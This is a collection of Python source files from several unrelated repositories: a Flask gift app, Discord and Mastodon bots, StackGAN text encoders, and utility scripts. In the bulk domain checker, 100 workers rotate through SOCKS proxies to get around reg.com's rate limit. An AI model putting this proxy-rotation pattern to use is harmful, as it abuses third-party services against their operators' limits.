"source": "1ntEgr8/christmas",
"score": 3
} |
#### File: 1ntEgr8/christmas/send_creator.py
```python
from send_email import send_email_creator, start_server, quit_server
import maketree
from surprise import db
from surprise.models import Creator, Recepient
def notify():
# need to go through the database
# check if the received part is True
# add functionality to bypass the truthiness of received
# collect all of the thank you notes in a dictionary
creators = Creator.query.all()
server = start_server()
count = 0
for creator in creators:
flag = True
posts_to_send = {}
recepients_for_creator = Recepient.query.filter_by(creator_id=creator.id)
for recepient in recepients_for_creator:
if recepient.received == False:
flag = False
break
if flag == True:
print("True")
for recepient in recepients_for_creator:
if recepient.thank_you_note:
posts_to_send[recepient.recepient_name] = recepient.thank_you_note
send_email_creator(server, creator.first_name, creator.email, posts_to_send)
count+=1
quit_server(server)
print("DONE NOTIFYING")
print(f"{count} people notified")
```
#### File: christmas/surprise/routes.py
```python
from flask import render_template, url_for, flash, redirect, request, session
from surprise.forms import RegistrationForm, AddRecepientForm
from surprise.models import Creator, Recepient
from surprise import app, db
from datetime import datetime
import hashlib
import time
# change the format of the recepient list
# get that logic done for today,
# then begin work on the reception part of the page
@app.route('/')
@app.route('/home')
def home():
return render_template('index.html')
@app.route('/about')
def about():
return render_template('about.html')
@app.route('/send', methods=['GET','POST'])
def send():
form = RegistrationForm()
if form.validate_on_submit():
user = Creator(first_name=form.first_name.data.title().strip().strip(),
last_name=form.last_name.data.title().strip().strip(),
email=form.email.data,
request_time=datetime.utcnow())
db.session.add(user)
db.session.commit()
session['first_name'] = form.first_name.data.title().strip().strip()
user = Creator.query.filter_by(first_name=form.first_name.data.title().strip().strip(), email=form.email.data).first()
session['user-id'] = user.id
flash(f'Santa has got your details {form.first_name.data}! Enter your recepients now ...', 'success')
return redirect(url_for('add', name=session['first_name'], user_id=session['user-id']))
return render_template('send.html', form=form)
@app.route('/add', methods=['GET','POST'])
def add():
user = Creator.query.filter_by(id=session.get('user-id',0)).first()
creator_sender = Recepient.query.filter_by(id=session.get('recepient-id',0)).first()
if creator_sender:
creator_sender='Send one to ' + creator_sender.sender.first_name + '. Type in the name'
else:
creator_sender=''
if user and not user.sent:
if request.method == 'POST':
names = request.form
print(names)
print("I AM HERE")
count=1
for name in names:
print(names[name])
print("ADDING RECEPIENT")
date_posted=datetime.utcnow()
recepient = Recepient(recepient_name=names[name].title().strip(),
date_posted=date_posted,
creator_id=session['user-id'])
db.session.add(recepient)
db.session.commit()
recepient = Recepient.query.filter_by(date_posted=date_posted).first()
recepient.image_file='gift_generated/'+str(session['user-id'])+'_'+str(recepient.id)+'.jpg'
db.session.commit()
count+=1
user.sent=True
return redirect(url_for('link'))
else:
return redirect(url_for('home'))
return render_template('add.html', creator_sender=creator_sender)
@app.route('/link', methods=['GET','POST'])
def link():
first_name=session['first_name']
user_id=session['user-id']
flash(f'Santa has received your order!', 'success')
return render_template('link.html',first_name=first_name, user_id=user_id)
@app.route('/receive/<string:first_name>/<int:user_id>', methods=['GET','POST'])
def receive(first_name, user_id):
path = request.path
creator_id = path[path.rfind('/')+1:]
user = Creator.query.filter_by(id=creator_id).first()
#add some validators
name = user.first_name
print(request.method)
if request.method == 'POST':
entered_name = request.form['recepient_name'].title().strip()
recepient = Recepient.query.filter_by(recepient_name=entered_name, creator_id=creator_id).first()
if recepient:
if recepient.image_created:
session['recepient-id'] = recepient.id
return redirect(url_for('load', first_name=name, user_id=creator_id, recepient_name=entered_name, recepient_id=recepient.id))
else:
return redirect(url_for('noimage', first_name=name, user_id=creator_id, recepient_name=entered_name, recepient_id=recepient.id))
else:
return redirect(url_for('sad'))
return render_template('receive.html', first_name=name)
@app.route('/load/<string:first_name>/<int:user_id>/<string:recepient_name>/<int:recepient_id>', methods=['GET','POST'])
def load(first_name, user_id, recepient_name, recepient_id, methods=['GET','POST']):
path = request.path
recepientid = path[path.rfind('/')+1:]
recepient = Recepient.query.filter_by(id=recepientid).first()
image_file = recepient.image_file
session['recepient-id'] = recepientid
return render_template('load.html', image_file=image_file)
@app.route('/noimage/<string:first_name>/<int:user_id>/<string:recepient_name>/<int:recepient_id>', methods=['GET','POST'])
def noimage(first_name, user_id, recepient_name, recepient_id):
path = request.path
recepient_id = path[path.rfind('/')+1:]
if request.method == 'POST':
email = request.form['email']
recepient = Recepient.query.filter_by(id=recepient_id).first()
recepient.recepient_email=email
db.session.commit()
return redirect(url_for('promo'))
return render_template('noimage.html')
@app.route('/redirect')
def promo():
return render_template('promo.html')
@app.route('/thanks', methods=['GET','POST'])
def thanks():
if request.method == 'POST':
recepient = Recepient.query.filter_by(id=session['recepient-id']).first()
recepient.received = True
recepient.thank_you_note = request.form['thanks']
if request.form.get('like','') == 'ok':
recepient.liked = True
db.session.commit()
return render_template('thanks.html')
@app.route('/sad')
def sad():
return render_template('sad.html')
# @app.route('/donate', methods=['GET','POST'])
# def donate():
# return render_template('donate.html')
``` |
{
"source": "1ntegrale9/Echidna",
"score": 2
} |
#### File: Echidna/echidna/utils.py
```python
from numpy import base_repr
def base36(num):
return base_repr(num, 36)
``` |
{
"source": "1ntegrale9/squidgirl",
"score": 2
} |
#### File: discordbot/cogs/general.py
```python
from discord.ext import commands
from datetime import datetime
import traceback
def anyin(list, elements):
return any(e in list for e in elements)
class General(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.Cog.listener()
async def on_ready(self):
await self.bot.get_channel(self.bot.id_channel_system).send(str(datetime.now()))
async def perse(self, message):
if message.guild.id != self.bot.id_guild_splatoon:
return
if str(self.bot.user.id) not in message.content:
return
if anyin(message.content, ['ふとん', '布団']):
return await self.sleep(self.bot, message)
if anyin(message.content, ['黒歴史']):
logs = [log async for log in message.channel.history() if log.author == message.author]
await message.channel.delete_messages(logs)
return await message.channel.send(f'{message.author.mention} は何も言ってない、いいね?')
if anyin(message.content, ['バルス']):
logs = [log async for log in message.channel.history() if log.author.bot]
await message.channel.delete_messages(logs)
return await message.channel.send(f'{message.author.mention} botなんていなかった!')
async def sleep(self, message):
afk = message.guild.afk_channel
vc = message.author.voice.channel
if not afk:
return await message.channel.send(f'{message.author.mention} おふとんはどこ?')
if not vc:
return await message.channel.send(f'{message.author.mention} ボイスチャンネルに入ってね!')
for member in vc.members:
await member.move_to(afk)
await message.channel.send('おやすみなさい!')
@commands.Cog.listener()
async def on_message(self, message):
try:
if message.author.bot:
return
if not message.content:
return
if message.guild.id != self.bot.id_guild_splatoon:
return
await self.perse(message)
except Exception as e:
await message.channel.send(str(e) + '\nっていうエラーが出たよ')
await self.bot.get_channel(self.bot.id_channel_system).send(
f'```\n{traceback.format_exc()}\n```'
)
def setup(bot):
bot.add_cog(General(bot))
```
#### File: mastodonbot/fedibird/count.py
```python
import os
from mastodon import Mastodon
from argparse import ArgumentParser
def fedibird():
return Mastodon(
access_token=os.getenv('MASTODON_TOKEN'),
api_base_url='https://fedibird.com',
)
def count(time):
client = fedibird()
statuses = sorted(
client.account_statuses(77150),
key=lambda status: status['created_at'],
reverse=True,
)
status = [status for status in statuses if status['poll'] is not None][0]
status_poll = status['poll']
votes = [poll['votes_count'] for poll in status_poll['options'] if poll['title'] == f'{time}時から参加可能'][0]
client.status_post(
status=f'{time}時から{votes}人が参加できるらしいよ! #今日のプラベ',
in_reply_to_id=status,
)
parser = ArgumentParser()
parser.add_argument('time', type=int)
args = parser.parse_args()
count(args.time)
``` |
{
"source": "1o0ko/StackGAN-v2",
"score": 3
} |
#### File: embedding_models/bilstm/model.py
```python
import torch.nn as nn
from embedding_models.configurable import Configurable
class BiLSTMEncoder(nn.Module, Configurable):
def __init__(self, n_src_vocab, d_word_vec=512, d_model=512, embedding_size=1024, dropout=0.0):
super(BiLSTMEncoder, self).__init__()
self.d_word_vec = d_word_vec
self.emb = nn.Embedding(n_src_vocab, d_word_vec, padding_idx=2)
self.bilstm = nn.LSTM(d_word_vec, d_model, batch_first=True, bidirectional=True)
self.encoding = nn.Linear(d_model * 2, embedding_size)
# initialize weights
self.init_weights()
def get_trainable_parameters(self):
return filter(lambda p: p.requires_grad, self.parameters())
def init_weights(self, initrange=0.1):
self.emb.weight.data.uniform_(-initrange, initrange)
for name, param in self.bilstm.named_parameters():
if 'bias' in name:
nn.init.constant(param, 0.0)
elif 'weight' in name:
nn.init.xavier_normal(param)
def forward(self, x):
embeddings = self.emb(x)
# take the output features (h_t) from the last layer of the BiLSTM for each t
output, hiddens = self.bilstm(embeddings)
encoding = self.encoding(output[:, -1, :])
return encoding
@classmethod
def get_arguments_from_configs(self, exp_cfg, model_cfg):
kwargs = {}
kwargs.update(model_cfg)
return kwargs
class BiLSTMClassifier(nn.Module):
def __init__(self, n_classes,
n_src_vocab, d_word_vec=512, d_model=512, embedding_size=1024, dropout=0.0):
''' Softmax classiffier on top of BiLSTM Encoder '''
super(BiLSTMClassifier, self).__init__()
self.encoder = BiLSTMEncoder(n_src_vocab, d_word_vec, d_model, embedding_size, dropout)
self.projection = nn.Linear(embedding_size, n_classes)
self.init_weights()
def forward(self, x):
encoding = self.encoder(x)
y = self.projection(encoding)
log_probs = nn.functional.log_softmax(y, dim=1)
return log_probs
def init_weights(self):
nn.init.constant(self.projection.bias, 0.0)
nn.init.xavier_normal(self.projection.weight)
@classmethod
def from_configs(self, exp_cfg, model_cfg):
return BiLSTMClassifier(**BiLSTMEncoder.get_arguments_from_configs(exp_cfg, model_cfg))
```
#### File: code/embedding_models/decepticon.py
```python
import numpy as np
import torch
import torch.nn as nn
from torch.autograd import Variable
from configurable import Configurable
from transformer.Models import Encoder
class Decepticon(nn.Module, Configurable):
''' An encoder with attention mechanism. '''
def __init__(
self, n_src_vocab, n_max_seq, n_layers=2, n_head=2,
d_word_vec=100, d_model=100, d_inner_hid=100, d_k=100, d_v=100,
dropout=0.1, proj_share_weight=True):
super(Decepticon, self).__init__()
self.encoder = Encoder(
n_src_vocab, n_max_seq, n_layers=n_layers, n_head=n_head,
d_word_vec=d_word_vec, d_model=d_model,
d_inner_hid=d_inner_hid, dropout=dropout)
assert d_model == d_word_vec, 'To facilitate the residual connections' \
'the dimensions of all module output shall be the same.'
def get_trainable_parameters(self):
''' Avoid updating the position encoding '''
enc_freezed_param_ids = set(map(id, self.encoder.position_enc.parameters()))
freezed_param_ids = enc_freezed_param_ids
return (p for p in self.parameters() if id(p) not in freezed_param_ids)
def get_sent_embedding(self, src_seq):
src_pos = Variable(
torch.arange(0, src_seq.size(1)).repeat(src_seq.size(0), 1).type(torch.LongTensor).cuda())
enc_output = self.encoder(src_seq, src_pos)
sent_embedding = enc_output.view(enc_output.size(0), -1)
return sent_embedding
def forward(self, src_seq):
src_pos = Variable(
torch.arange(0, src_seq.size(1)).repeat(src_seq.size(0), 1).type(torch.LongTensor).cuda())
enc_output = self.encoder(src_seq, src_pos)
sent_embedding = enc_output.view(enc_output.size(0), -1)
return sent_embedding
@classmethod
def get_arguments_from_configs(cls, experiment_cfg, model_cfg):
kwargs = {'n_max_seq': experiment_cfg.TEXT.MAX_LEN}
kwargs.update(model_cfg)
return kwargs
if __name__ == '__main__':
test_module = Decepticon(10, 7)
test_module.cuda()
seq = np.asarray([[0, 1, 4, 5, 6, 1, 2]])
seq = Variable(torch.from_numpy(seq).cuda())
out = test_module(seq)
print(out.size())
```
#### File: embedding_models/transformer/Translator.py
```python
import torch
import torch.nn as nn
from torch.autograd import Variable
from Models import Transformer
from Beam import Beam
class Translator(object):
''' Load with trained model and handle the beam search '''
def __init__(self, opt):
self.opt = opt
self.tt = torch.cuda if opt.cuda else torch
checkpoint = torch.load(opt.model)
model_opt = checkpoint['settings']
self.model_opt = model_opt
model = Transformer(
model_opt.src_vocab_size,
model_opt.tgt_vocab_size,
model_opt.max_token_seq_len,
proj_share_weight=model_opt.proj_share_weight,
embs_share_weight=model_opt.embs_share_weight,
d_k=model_opt.d_k,
d_v=model_opt.d_v,
d_model=model_opt.d_model,
d_word_vec=model_opt.d_word_vec,
d_inner_hid=model_opt.d_inner_hid,
n_layers=model_opt.n_layers,
n_head=model_opt.n_head,
dropout=model_opt.dropout)
prob_projection = nn.LogSoftmax()
model.load_state_dict(checkpoint['model'])
print('[Info] Trained model state loaded.')
if opt.cuda:
model.cuda()
prob_projection.cuda()
else:
model.cpu()
prob_projection.cpu()
model.prob_projection = prob_projection
self.model = model
self.model.eval()
def translate_batch(self, src_batch):
''' Translation work in one batch '''
# Batch size is in different location depending on data.
src_seq, src_pos = src_batch
batch_size = src_seq.size(0)
beam_size = self.opt.beam_size
#- Enocde
enc_output, = self.model.encoder(src_seq, src_pos)
#--- Repeat data for beam
src_seq = Variable(
src_seq.data.repeat(1, beam_size).view(
src_seq.size(0) * beam_size, src_seq.size(1)))
enc_output = Variable(
enc_output.data.repeat(1, beam_size, 1).view(
enc_output.size(0) * beam_size, enc_output.size(1), enc_output.size(2)))
#--- Prepare beams
beams = [Beam(beam_size, self.opt.cuda) for _ in range(batch_size)]
beam_inst_idx_map = {
beam_idx: inst_idx for inst_idx, beam_idx in enumerate(range(batch_size))}
n_remaining_sents = batch_size
#- Decode
for i in range(self.model_opt.max_token_seq_len):
len_dec_seq = i + 1
# -- Preparing decoded data seq -- #
# size: batch x beam x seq
dec_partial_seq = torch.stack([
b.get_current_state() for b in beams if not b.done])
# size: (batch * beam) x seq
dec_partial_seq = dec_partial_seq.view(-1, len_dec_seq)
# wrap into a Variable
dec_partial_seq = Variable(dec_partial_seq, volatile=True)
# -- Preparing decoded pos seq -- #
# size: 1 x seq
dec_partial_pos = torch.arange(1, len_dec_seq + 1).unsqueeze(0)
# size: (batch * beam) x seq
dec_partial_pos = dec_partial_pos.repeat(n_remaining_sents * beam_size, 1)
# wrap into a Variable
dec_partial_pos = Variable(dec_partial_pos.type(torch.LongTensor), volatile=True)
if self.opt.cuda:
dec_partial_seq = dec_partial_seq.cuda()
dec_partial_pos = dec_partial_pos.cuda()
# -- Decoding -- #
dec_output = self.model.decoder(
dec_partial_seq, dec_partial_pos, src_seq, enc_output)
dec_output = dec_output[:, -1, :] # (batch * beam) * d_model
dec_output = self.model.tgt_word_proj(dec_output)
out = self.model.prob_projection(dec_output)
# batch x beam x n_words
word_lk = out.view(n_remaining_sents, beam_size, -1).contiguous()
active_beam_idx_list = []
for beam_idx in range(batch_size):
if beams[beam_idx].done:
continue
inst_idx = beam_inst_idx_map[beam_idx]
if not beams[beam_idx].advance(word_lk.data[inst_idx]):
active_beam_idx_list += [beam_idx]
if not active_beam_idx_list:
# all instances have finished their path to <EOS>
break
# in this section, the sentences that are still active are
# compacted so that the decoder is not run on completed sentences
active_inst_idxs = self.tt.LongTensor(
[beam_inst_idx_map[k] for k in active_beam_idx_list])
# update the idx mapping
beam_inst_idx_map = {
beam_idx: inst_idx for inst_idx, beam_idx in enumerate(active_beam_idx_list)}
def update_active_seq(seq_var, active_inst_idxs):
''' Remove the src sequence of finished instances in one batch. '''
inst_idx_dim_size, rest_dim_sizes = seq_var.size()
inst_idx_dim_size = inst_idx_dim_size * len(active_inst_idxs) // n_remaining_sents
new_size = (inst_idx_dim_size, rest_dim_sizes)
# select the active instances in batch
original_seq_data = seq_var.data.view(n_remaining_sents, -1)
active_seq_data = original_seq_data.index_select(0, active_inst_idxs)
active_seq_data = active_seq_data.view(*new_size)
return Variable(active_seq_data, volatile=True)
def update_active_enc_info(enc_info_var, active_inst_idxs):
''' Remove the encoder outputs of finished instances in one batch. '''
inst_idx_dim_size, rest_dim_sizes = enc_info_var.size()
inst_idx_dim_size = inst_idx_dim_size * len(active_inst_idxs) // n_remaining_sents
new_size = (inst_idx_dim_size, rest_dim_sizes)
# select the active instances in batch
original_enc_info_data = enc_info_var.data.view(
n_remaining_sents, -1, self.model_opt.d_model)
active_enc_info_data = original_enc_info_data.index_select(0, active_inst_idxs)
active_enc_info_data = active_enc_info_data.view(*new_size)
return Variable(active_enc_info_data, volatile=True)
src_seq = update_active_seq(src_seq, active_inst_idxs)
enc_output = update_active_enc_info(enc_output, active_inst_idxs)
#- update the remaining size
n_remaining_sents = len(active_inst_idxs)
#- Return useful information
all_hyp, all_scores = [], []
n_best = self.opt.n_best
for beam_idx in range(batch_size):
scores, tail_idxs = beams[beam_idx].sort_scores()
all_scores += [scores[:n_best]]
hyps = [beams[beam_idx].get_hypothesis(i) for i in tail_idxs[:n_best]]
all_hyp += [hyps]
return all_hyp, all_scores
```
#### File: code/miscc/utils.py
```python
import re
import numpy as np
import scipy.misc
import os
from scipy.misc import imresize
from PIL import Image, ImageDraw, ImageFont
def mkdir_p(path):
try:
os.makedirs(path)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
def drawCaption(img, caption, max_len):
img_txt = Image.fromarray(img)
# get a font
fnt = ImageFont.truetype('/eai/project/.fonts/FreeMono.ttf', 30)
# get a drawing context
d = ImageDraw.Draw(img_txt)
d.text((10, 256), 'Stage-I', font=fnt, fill=(0, 0, 0, 255))
d.text((10, 512), 'Stage-II', font=fnt, fill=(0, 0, 0, 255))
d.text((10, 768), 'Stage-III', font=fnt, fill=(0, 0, 0, 255))
caption = caption.split(' ')
cap1 = ' '.join(caption[:max_len])
cap2 = ' '.join(caption[max_len + 1:])
d.text((256, 10), cap1, font=fnt, fill=(0, 0, 0, 255))
d.text((256, 60), cap2, font=fnt, fill=(127, 127, 127, 255))
return img_txt
def save_images_with_text(
lr_sample_batchs, hr_sample_batchs, sr_sample_batchs,
reals_batch, texts_batch, batch_size, max_len,
startID, save_dir=None):
if save_dir and not os.path.isdir(save_dir):
print('Make a new folder: ', save_dir)
mkdir_p(save_dir)
# Save up to 16 samples for each text embedding/sentence
img_shape = sr_sample_batchs[0][0].shape
super_images = []
for i in range(batch_size):
if not re.search('[a-zA-Z]+', texts_batch[i]):
continue
padding = 255 + np.zeros(img_shape)
row1 = [padding]
row2 = [padding]
row3 = [padding]
for j in range(lr_sample_batchs[0].shape[0]):
lr_img = lr_sample_batchs[i][j]
hr_img = hr_sample_batchs[i][j]
sr_img = sr_sample_batchs[i][j]
if j == 0:
row1.append(imresize(reals_batch[0][i], sr_img.shape[:2]))
row2.append(imresize(reals_batch[1][i], sr_img.shape[:2]))
row3.append(imresize(reals_batch[2][i], sr_img.shape[:2]))
lr_re_sample = imresize(lr_img, sr_img.shape[:2])
hr_re_sample = imresize(hr_img, sr_img.shape[:2])
row1.append(lr_re_sample)
row2.append(hr_re_sample)
row3.append(sr_img)
row1 = np.concatenate(row1, axis=1)
row2 = np.concatenate(row2, axis=1)
row3 = np.concatenate(row3, axis=1)
superimage = np.concatenate([row1, row2, row3], axis=0)
top_padding = 255 + np.zeros((128, superimage.shape[1], 3))
superimage = np.concatenate([top_padding, superimage], axis=0)
fullpath = '%s/sentence_%04d.jpg' % (save_dir, startID + i)
superimage = drawCaption(np.uint8(superimage), texts_batch[i], max_len)
if save_dir:
scipy.misc.imsave(fullpath, superimage)
super_images.append(superimage)
return super_images
``` |
{
"source": "1ocalhost/py_cheat",
"score": 2
} |
#### File: 1ocalhost/py_cheat/bulk_domain_checker_su.py
```python
import os
import asyncio
import aiohttp
import logging
from itertools import cycle
from aiohttp_socks import ProxyConnector
logger = None
def fmt_exc(exc):
return f'{type(exc).__name__}: "{exc}"'
def num2str_base(num, base_symbols, width=None):
base = len(base_symbols)
assert base > 1
def encode(n):
return str(base_symbols[n])
def impl(num):
if num < base:
return encode(num)
else:
return impl(num // base) + encode(num % base)
result = impl(num)
if isinstance(width, int):
fill_width = width - len(result)
if fill_width > 0:
return base_symbols[0] * fill_width + result
return result
def str2num_base(num_str, base_symbols):
base = len(base_symbols)
symbol2num = {}
for i in range(base):
symbol2num[base_symbols[i]] = i
result = 0
tokens = list(reversed(num_str))
for i in range(len(tokens)):
result += symbol2num[tokens[i]] * (base ** i)
return result
class TaskAllocator:
BASE_SYMBOLS = [chr(ord('a') + i) for i in range(26)]
def __init__(self, name_begin, name_end):
assert len(name_begin) == len(name_end)
self.domain_width = len(name_begin)
self.task_begin = self.str2num(name_begin)
self.task_end = self.str2num(name_end)
def str2num(self, num_str):
return str2num_base(num_str, self.BASE_SYMBOLS)
def num2str(self, num):
return num2str_base(num, self.BASE_SYMBOLS, self.domain_width)
def get(self, max_task_num=1):
logger.info(f'TaskAllocator: [{self.task_begin}/{self.task_end}]')
assert 1 <= max_task_num <= 100
tasks = []
for i in range(max_task_num):
if self.task_begin > self.task_end:
break
tasks.append(self.task_begin)
self.task_begin += 1
return [self.num2str(t) for t in tasks]
class ProxyAllocator:
def __init__(self):
self.proxies = []
self.read_by_lines('socks5', 'socks5.txt')
self.read_by_lines('socks4', 'socks4.txt')
self.proxies_itor = cycle(self.proxies)
def read_by_lines(self, type_, filename):
with open(filename) as f:
lines = f.readlines()
for line in lines:
line = line.strip()
if not line:
continue
self.proxies.append((type_, line))
def get(self):
type_, server_port = next(self.proxies_itor)
proxy = f'{type_}://{server_port}'
logger.info(f'ProxyAllocator: {proxy}')
return proxy
class Checker:
def __init__(self, bus):
self.bus = bus
self.proxy = None
self.first_call_api = True
@staticmethod
def build_payload(names):
return {
'ru': 0,
'is_bulk_registration': 0,
'bulk_procedure': 1,
'istransfer': 0,
'domains': ' '.join(names),
'fake_responses': 0,
}
async def call_api(self, names):
if self.first_call_api:
self.first_call_api = False
else:
await asyncio.sleep(1)
if not self.proxy:
self.proxy = self.bus.proxy_allocator.get()
connector = ProxyConnector.from_url(self.proxy)
timeout = aiohttp.ClientTimeout(total=10)
url = 'https://www.reg.com/domain/new/check_queue'
payload = self.build_payload(names)
try:
async with aiohttp.ClientSession(
connector=connector, timeout=timeout) as session:
async with session.post(url, data=payload) as resp:
return resp.status, (await resp.json())
except Exception as e:
logger.warning(f'call_api: {fmt_exc(e)}')
self.proxy = None
return None, {}
async def run(self):
assigner = self.bus.task_allocator
while True:
tasks = [x + '.su' for x in assigner.get(3)]
if not tasks:
break
while tasks:
code, result = await self.call_api(tasks)
if code is None:
continue
if code != 200:
logger.warning(f'code {code} with {tasks}')
self.proxy = None
continue
domains = result.get('domains')
if domains is None: # {'error': 'LIMIT_EXCEEDED'}
logger.error(f'result: {result}')
self.proxy = None
continue
for item in result['domains']:
domain = item['domain']
tasks.remove(domain)
logger.info(f'{domain} => {item["error_code"]}')
if item['avail']:
self.bus.add_available(domain)
class CheckerBus:
def __init__(self):
self.task_allocator = TaskAllocator('aaa', 'zzz')
self.proxy_allocator = ProxyAllocator()
self.available_domains = open('available_domains.txt', 'a')
def add_available(self, domain):
self.available_domains.write(domain + '\n')
self.available_domains.flush()
def bulk_checker_loop(self, worker_num):
assert 1 <= worker_num <= 200
async def checker():
await Checker(self).run()
workers = [checker() for i in range(worker_num)]
future = asyncio.gather(*workers)
loop = asyncio.get_event_loop()
loop.run_until_complete(future)
def start(self):
try:
self.bulk_checker_loop(100)
finally:
self.available_domains.close()
def main():
FORMAT = '[%(asctime)s] [%(levelname)s] %(message)s'
logging.basicConfig(format=FORMAT)
logger_ = logging.getLogger(__name__)
logger_.setLevel(logging.DEBUG)
global logger
logger = logger_
if os.name == 'nt':
policy = asyncio.WindowsSelectorEventLoopPolicy()
asyncio.set_event_loop_policy(policy)
CheckerBus().start()
if __name__ == '__main__':
main()
```
#### File: 1ocalhost/py_cheat/dns_lookup.py
```python
import socket
import ipaddress
def parse_dns_string(reader, data):
res = ''
to_resue = None
bytes_left = 0
for ch in data:
if not ch:
break
if to_resue is not None:
resue_pos = chr(to_resue) + chr(ch)
res += reader.reuse(resue_pos)
break
if bytes_left:
res += chr(ch)
bytes_left -= 1
continue
if (ch >> 6) == 0b11 and reader is not None:
to_resue = ch - 0b11000000
else:
bytes_left = ch
if res:
res += '.'
return res
class StreamReader:
def __init__(self, data):
self.data = data
self.pos = 0
def read(self, len_):
pos = self.pos
if pos >= len(self.data):
raise
res = self.data[pos: pos+len_]
self.pos += len_
return res
def reuse(self, pos):
pos = int.from_bytes(pos.encode(), 'big')
return parse_dns_string(None, self.data[pos:])
def make_dns_query_domain(domain):
def f(s):
return chr(len(s)) + s
parts = domain.split('.')
parts = list(map(f, parts))
return ''.join(parts).encode()
def make_dns_request_data(dns_query):
req = b'\xaa\xbb\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00'
req += dns_query
req += b'\x00\x00\x01\x00\x01'
return req
def add_record_to_result(result, type_, data, reader):
if type_ == 'A':
item = str(ipaddress.IPv4Address(data))
elif type_ == 'CNAME':
item = parse_dns_string(reader, data)
else:
return
result.setdefault(type_, []).append(item)
def parse_dns_response(res, dq_len, req):
reader = StreamReader(res)
def get_query(s):
return s[12:12+dq_len]
data = reader.read(len(req))
assert(get_query(data) == get_query(req))
def to_int(bytes_):
return int.from_bytes(bytes_, 'big')
result = {}
res_num = to_int(data[6:8])
for i in range(res_num):
reader.read(2)
type_num = to_int(reader.read(2))
type_ = None
if type_num == 1:
type_ = 'A'
elif type_num == 5:
type_ = 'CNAME'
reader.read(6)
data = reader.read(2)
data = reader.read(to_int(data))
add_record_to_result(result, type_, data, reader)
return result
def dns_lookup(domain, address):
dns_query = make_dns_query_domain(domain)
dq_len = len(dns_query)
req = make_dns_request_data(dns_query)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout(2)
try:
sock.sendto(req, (address, 53))
res, _ = sock.recvfrom(1024 * 4)
result = parse_dns_response(res, dq_len, req)
except Exception:
return
finally:
sock.close()
return result
if __name__ == '__main__':
print(dns_lookup('www.stackoverflow.com', "8.8.8.8"))
```
#### File: 1ocalhost/py_cheat/http_proxy.py
```python
import re
import asyncio
all_clients = {}
re_http_forward_proxy = re.compile(
r'^http://([^:/]+)(?::([^/]*))?/(.*)')
async def read_http_header(reader):
header = b''
while True:
line = await reader.readline()
if not line:
return
header += line
if line == b'\r\n':
break
return header
def remore_useless_header(header):
def not_proxy_keep_alive(x):
return not x.lower().startswith('proxy-connection:')
return list(filter(not_proxy_keep_alive, header))
async def get_request_info_from_header(reader):
header = await read_http_header(reader)
if not header:
raise
header_items = header.decode().split('\r\n')
method_args = header_items[0].split(' ')
method = method_args[0]
uri = method_args[1]
tunnel_mode = (method == 'CONNECT')
print(method, uri)
if tunnel_mode:
remote_host = uri.split(':')
host = remote_host[0]
port = int(remote_host[1])
else:
m = re_http_forward_proxy.match(uri)
if not m:
raise
host = m.group(1)
port_str = m.group(2)
port = int(port_str) if port_str else 80
method_args[1] = '/' + m.group(3)
header_items[0] = ' '.join(method_args)
header_items = remore_useless_header(header_items)
new_header = '\r\n'.join(header_items).encode()
return new_header, tunnel_mode, (host, port)
async def relay_stream(read1, write1, read2, write2):
async def relay(reader, writer):
while True:
line = await reader.read(1024)
if len(line) == 0:
break
writer.write(line)
await writer.drain()
await asyncio.wait([
relay(read1, write2),
relay(read2, write1)
])
async def server_handler_impl(reader, writer):
try:
header, tunnel_mode, remote_host = \
await get_request_info_from_header(reader)
peer_reader, peer_writer = \
await asyncio.open_connection(*remote_host)
except Exception:
return
try:
if tunnel_mode:
writer.write(b'HTTP/1.1 200 Connection established\r\n\r\n')
await writer.drain()
else:
peer_writer.write(header)
await peer_writer.drain()
await relay_stream(reader, writer, peer_reader, peer_writer)
finally:
peer_writer.close()
async def server_handler(reader, writer):
routine = server_handler_impl(reader, writer)
task = asyncio.ensure_future(routine)
all_clients[task] = (reader, writer)
def client_done(task):
del all_clients[task]
writer.close()
task.add_done_callback(client_done)
async def server_loop(host, port):
def exception_handler(loop, context):
if 'exception' in context:
exception = context['exception']
if isinstance(exception, OSError):
return
loop = asyncio.get_event_loop()
loop.set_exception_handler(exception_handler)
server = await asyncio.start_server(server_handler, host, port)
await server.serve_forever()
if __name__ == '__main__':
asyncio.run(server_loop('127.0.0.1', 9000))
```
#### File: 1ocalhost/py_cheat/pubg_resolution_modifier.pyw
```python
import os
import re
import ctypes
from pathlib import Path
# Q: Why not using configparser module?
# A: Emmm, it raised "configparser.DuplicateOptionError".
CONF_PATH = \
R'%localappdata%\TslGame\Saved\Config\WindowsNoEditor' \
R'\GameUserSettings.ini'
WIDTH, HEIGHT = 1920, 1080
def msgbox(text, title=''):
func = ctypes.windll.user32.MessageBoxW
func(None, text, title, 0)
def change_resolution_size(conf, width, height):
new_conf = re.sub(
r'(\nResolutionSizeX=)(\d+)', r'\g<1>' + str(width), conf)
new_conf = re.sub(
r'(\nResolutionSizeY=)(\d+)', r'\g<1>' + str(height), new_conf)
return new_conf
def modify_conf(conf_file, width, height):
with open(conf_file, 'rb') as f:
conf = f.read(1024 * 1024).decode()
with open(conf_file, 'wb') as f:
new_conf = change_resolution_size(conf, width, height)
f.write(new_conf.encode())
def main():
conf_path = Path(os.path.expandvars(CONF_PATH))
width, height = WIDTH, HEIGHT
modify_conf(conf_path, width, height)
msgbox(f'OK, changed to: {width}x{height}', conf_path.name)
if __name__ == "__main__":
main()
```
#### File: 1ocalhost/py_cheat/repair_imperfect_jpeg.py
```python
import os
import sys
from pathlib import Path
from PIL import Image
TAB1 = ' ' * 2
TAB2 = ' ' * 4
IMPERFECT_JPEG_HEAD = bytes.fromhex(
'FF D8 FF EE 00 0E 41 64 6F 62 65 00 64 00')
def convert_image_file(file_path):
print(f'{TAB2} Opening... ', end='\r')
origin = Image.open(file_path)
print(f'{TAB2} Converting...', end='\r')
img_copy = origin.convert('RGB')
print(f'{TAB2} Saving... ', end='\r')
img_copy.save(file_path)
print(f'{TAB2} Converted. ')
def is_imperfect_jpeg(path):
if not path.endswith('.JPEG'):
return False
try:
with open(path, 'rb') as f:
data = f.read(len(IMPERFECT_JPEG_HEAD))
return data == IMPERFECT_JPEG_HEAD
except Exception as e:
print(f'{TAB2} ERROR: {e}')
return False
def convert_file_list(items):
converted_num = 0
for file_ in items:
print(f'{TAB1} Checking "{file_}"...')
if os.path.isdir(file_):
print(f'{TAB2} Skiped (folder).')
continue
